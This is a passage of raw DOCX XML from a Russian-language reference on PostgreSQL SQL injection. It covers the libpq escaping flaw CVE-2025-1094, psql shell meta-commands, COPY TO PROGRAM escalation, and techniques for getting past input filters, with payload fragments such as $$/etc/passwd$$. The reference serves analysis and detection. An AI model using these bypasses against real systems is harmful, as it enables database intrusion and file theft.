          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API. Этим CVE-2025-1094 отличается от классических 3.9.1–3.9.6, где приёмы — про переписывание payload в форму, которую фильтр пропускает; здесь фильтр (PQescape*) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сам</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> превращает безопасную строку в инъекционную.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С точки зрения позиционирования: 3.9 говорит «вот лексические/encoding-приёмы, обходящие input-фильтр». CVE-2025-1094 — самая extreme форма этого класса: encoding-приём, против которого штатный escape-механизм бессилен.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что важно знать сейчас</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1) Уязвимы только цепочки через `psql` (или libpq-call → psql).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сам PG-сервер этим багом не затронут. Если приложение строит SQL через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescape*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сразу шлёт его серверу через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 — серверный парсер увидит невалидный UTF-8 и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">отвергнет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запрос с ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid byte sequence for encoding "UTF8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. PG Error Codes 22021). Атака работает только когда payload проходит через psql-stage, где meta-commands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\copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> дают shell-уровень доступа на клиентской машине.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2) Не уязвимы Django / SQLAlchemy / asyncpg в обычной конфигурации.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Эти стэки используют либо параметризацию (server-side prepared statements), либо собственные quote-функции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg2.extensions.adapt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asyncpg.Connection.set_type_codec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), которые не идут через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescape*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или идут, но результат подаётся в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 а не в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Целевые жертвы — backup-обёртки, admin-CLI, migration-утилиты (конкретные продукты — в 4.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3) Patch-окно.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Уязвимы все psql/libpq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до 17.3, 16.7, 15.11, 14.16, 13.19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (релиз 13 февраля 2025). Версия psql — самостоятельный фактор: даже если PG-сервер 17.4, но psql на машине оператора всё ещё 17.2 — chain работает. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка: `psql --version` на каждом хосте, где psql установлен.</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FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — типичная эскалация после получения SQL injection: вместо клиентского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серверный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY TO PROGRAM</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3.9.4 (E-strings)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — близкая лексическая тематика, но другая семантика: E-strings — официальная фича PG для escape, без багов; CVE-2025-1094 — баг в client-side escape API.</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 — полный разбор: CVSS, disclosure timeline, цепочка с CVE-2024-12356, patch-окно.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4.7 (Цепочки)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-1094 → COPY TO PROGRAM (R21).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 и не должно быть:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2025-1094 — баг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">клиентской библиотеки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не серверного SQL. Серверный judge на основе rules.py его обнаружить не может (на момент срабатывания payload уже валиден). Детекция — на уровне статического анализа кода приложения (есть ли в коде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.run(["psql", ...])</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PQescape*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">?) или мониторинга версий libpq/psql на хостах.</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CVE-2025-1094</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — версии fix. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(R6)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libpq — PQescapeLiteral / PQescapeIdentifier / PQescapeString / PQescapeStringConn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — затронутые функции.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psql — Meta-Commands (`\!`, `\copy`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фундамент chain через psql.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Остальные источники (Rapid7 disclosure, SecureLayer7 разбор) — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.9 разобраны семь приёмов обхода input-фильтров — WAF, самописных sanitizer-ов и blacklist-функций в коде. Принципиально: 3.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не побеждает параметризацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — payload идёт в значение параметра как литерал. 3.9 побеждает только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">текстовую фильтрацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload-а перед попаданием в SQL-builder. Если параметризация в коде есть и работает (см. 2.1 и 3.5), любая 3.9-кодировка просто становится литералом, не интерпретируется как SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория делится на два класса приёмов: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Лексические обходки (3.9.1–3.9.5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — переписывают payload в семантически эквивалентную форму с другим синтаксисом, чтобы regex-фильтр не нашёл сигнатуру.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Структурные обходки (3.9.6)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакуют форму разделителей и регистра ключевых слов.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3.9.7 — особый случай:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> баг в самом libpq-санитайзере (CVE-2025-1094), который превращает «защищённый» payload в SQL injection при невалидном UTF-8. Это указатель на 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Per-подраздел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3.9.1 Dollar-quoting `$$...$$` и `$tag$...$tag$`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива одиночной кавычке для литералов. Обходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">apostrophe-escape sanitizer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replace("'", "''")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">count-based WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (нечётное число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Двойное применение: Payload A — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$$/etc/passwd$$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как путь в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Payload B — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как обход extended-protocol stacking ограничения. R5.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3.9.2 `chr(N)||chr(N)||...`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — собирает строку из ASCII-кодов. Обходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">keyword-blacklist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на имена функций/каталогов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Payload A — chr-литерал для значения; Payload B — chr-цепочка через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 DO-блоке для имени функции. Главный недостаток — длинно, легко детектируется по статистике </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(\d+)||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3.9.3 Unicode-escape `U&amp;'\0070\0067...'` и `U&amp;"identifier"`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — лексический префикс, без function call. Обходит фильтр «слишком много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function_call_regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Бонусы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обхода фильтра на backslash;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для имён таблиц/колонок на лексическом уровне. R-источники: SQL:2003 §5.3.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3.9.4 E-strings `E'\xNN'` и `E'\NNN'`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — hex/octal-byte literals. Близок к 3.9.3, но компактнее (2 hex-цифры на байт против 4 в Unicode-escape). Уникальная возможность — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'\x00'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для NUL-byte (обход C-string sanitizer-ов, которые обрываются на NUL). Octal-форма ортогональна hex — фильтр на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\NNN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3.9.5 `convert_from(decode('...', 'hex'|'base64'), 'UTF8')`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — самая компактная форма для длинных строк. Один literal (hex/base64) на всю строку, без побайтовых escape. Hex заметнее в логах, base64 «безобиднее» (часто скипается ручным разбором). Payload C — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
